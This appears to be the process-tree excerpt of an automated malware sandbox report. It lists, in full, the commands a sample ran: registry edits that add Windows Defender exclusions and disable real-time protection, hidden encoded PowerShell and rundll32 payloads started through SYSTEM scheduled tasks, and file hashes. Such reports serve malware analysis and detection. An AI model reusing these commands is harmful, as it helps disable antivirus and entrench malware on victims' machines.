\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:904
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1044
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1784
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:912
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzgdJJbPO" /SC once /ST 03:05:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzgdJJbPO"4⤵PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzgdJJbPO"4⤵PID:564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "boqjQyEgeBagneJBps" /SC once /ST 19:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\dfgYjxP.exe\" JW /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1872
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {737C5EC4-6648-49F9-9210-C1D158982162} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]1⤵PID:1048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1564
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1528
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1008 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1500
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1228
-
C:\Windows\system32\taskeng.exetaskeng.exe {EC8C5FBA-A9E7-43A1-95F9-FEC130087074} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1256
-
C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\dfgYjxP.exeC:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR\jugYpljNMwYtfWN\dfgYjxP.exe JW /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:680 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggmGZAWqc" /SC once /ST 03:30:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggmGZAWqc"3⤵PID:1936
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggmGZAWqc"3⤵PID:1576
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1564
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:880
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkfqRUelh" /SC once /ST 13:29:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkfqRUelh"3⤵PID:776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkfqRUelh"3⤵PID:1884
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:323⤵PID:1216
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:643⤵PID:1656
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:323⤵PID:1016
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:324⤵PID:2000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:643⤵PID:876
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:644⤵PID:1696
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\UEaXSoKYgiRfepGU\qolLkWyK\AsmjfGIpJVBFTUvQ.wsf"3⤵PID:820
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\UEaXSoKYgiRfepGU\qolLkWyK\AsmjfGIpJVBFTUvQ.wsf"3⤵
- Modifies data under HKEY_USERS
PID:776 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:644⤵PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1288
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1696
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:324⤵PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:840
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:324⤵PID:596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BjvgkLgoU" /t REG_DWORD /d 0 /reg:644⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:324⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ETlMoSXAKBfU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:324⤵PID:1732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jtlBjnUcyHUn" /t REG_DWORD /d 0 /reg:644⤵PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkHAEDYevLoxC" /t REG_DWORD /d 0 /reg:644⤵PID:1552
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR" /t REG_DWORD /d 0 /reg:644⤵PID:2000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:324⤵PID:876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\EgLUknTySUlyFxVB" /t REG_DWORD /d 0 /reg:644⤵PID:1044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:324⤵PID:1268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dlkQspZoJEIslwsvR" /t REG_DWORD /d 0 /reg:644⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:324⤵PID:1680
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\UEaXSoKYgiRfepGU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2008
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEdqjqhDe" /SC once /ST 10:23:59 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEdqjqhDe"3⤵PID:1580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEdqjqhDe"3⤵PID:532
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1872
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1648
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:848
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1096
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SqCKrsanZcXdLkunv" /SC once /ST 16:09:48 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UEaXSoKYgiRfepGU\YZQeLUiYwOmUvOB\vclgNht.exe\" IW /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "SqCKrsanZcXdLkunv"3⤵PID:1896
-
-
-
C:\Windows\Temp\UEaXSoKYgiRfepGU\YZQeLUiYwOmUvOB\vclgNht.exeC:\Windows\Temp\UEaXSoKYgiRfepGU\YZQeLUiYwOmUvOB\vclgNht.exe IW /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:808 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "boqjQyEgeBagneJBps"3⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1308
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1764
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1988
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\BjvgkLgoU\LUMjPj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eTxnbZekOUBRWtJ" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1788
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eTxnbZekOUBRWtJ2" /F /xml "C:\Program Files (x86)\BjvgkLgoU\ErZeYfF.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "eTxnbZekOUBRWtJ"3⤵PID:1492
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "eTxnbZekOUBRWtJ"3⤵PID:1288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SeBSrkOEcBmbmz" /F /xml "C:\Program Files (x86)\ETlMoSXAKBfU2\JSfpubN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:2020
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QdfrjvlIjZAGa2" /F /xml "C:\ProgramData\EgLUknTySUlyFxVB\mjGNnCv.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KILciVuzwnfuwtlSp2" /F /xml "C:\Program Files (x86)\xOXloLrYuJMznnLuiyR\dasdwCI.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:848
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dsONfsHLGVeVnEqCikO2" /F /xml "C:\Program Files (x86)\lkHAEDYevLoxC\WZEqTFX.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1856
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "epwDgMxkovfKwwbuy" /SC once /ST 12:43:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\UEaXSoKYgiRfepGU\EqKbwZba\nBSvNvX.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "epwDgMxkovfKwwbuy"3⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1748
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:732
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1500
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SqCKrsanZcXdLkunv"3⤵PID:1556
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UEaXSoKYgiRfepGU\EqKbwZba\nBSvNvX.dll",#1 /site_id 5254032⤵PID:1812
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UEaXSoKYgiRfepGU\EqKbwZba\nBSvNvX.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:880 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "epwDgMxkovfKwwbuy"4⤵PID:1232
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1580
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1324
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1800
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cefb2b6d5ce99c887899afd010dd0751
SHA1a255a02a1d701c00f5d7bf8d6afbd6c86348a07c
SHA256f60ecc2e6e5d5d6250ef64f854e93f89acd3888bceb796eb457e298bce980a4f
SHA512df657007525d33d8737dca26b1e991d6fa68004f84b4a7bafc4ecb9c492b5013d81e83ffdd77515f3964b83b0e40596c96c68bc4bfbd2f655b19f3763660269a
-
Filesize
2KB
MD54bd5511cea2805cb2bb415ab8752e7c3
SHA1e3b5b6990989dc02cf850c530c5d477feed89031
SHA256595118a32ee1ddd5b7f4ac979c02c4dcdc0e0605561956702e6c6455572055a7
SHA5124b3d0710d2437e8ed602b313cbad7038a8eada03083eba929bec9292fb21f3c8d3250e9e0b7360eafe52e934bf1912e854448dc1278bf5653911482384ce4ae8
-
Filesize
2KB
MD52baaf8c4bf02ac9c10a9b4936fc3db3f
SHA1175f9c04d9f179080780c76ea6886f6c4da742f8
SHA256d3e8e1d8eb552aeb2ef85243df125b4b105444128cdd268d46c3943248b33808
SHA51276b295a5eec8d5bf7ce5ef1e96e9e4d6b671c7f345f5fca0ee8f52c24bd0e9cb7baa1e6f31963dd00ce8ef8b47a74cb8a9f7c8e624b72c996299be9a2d7c932d
-
Filesize
2KB
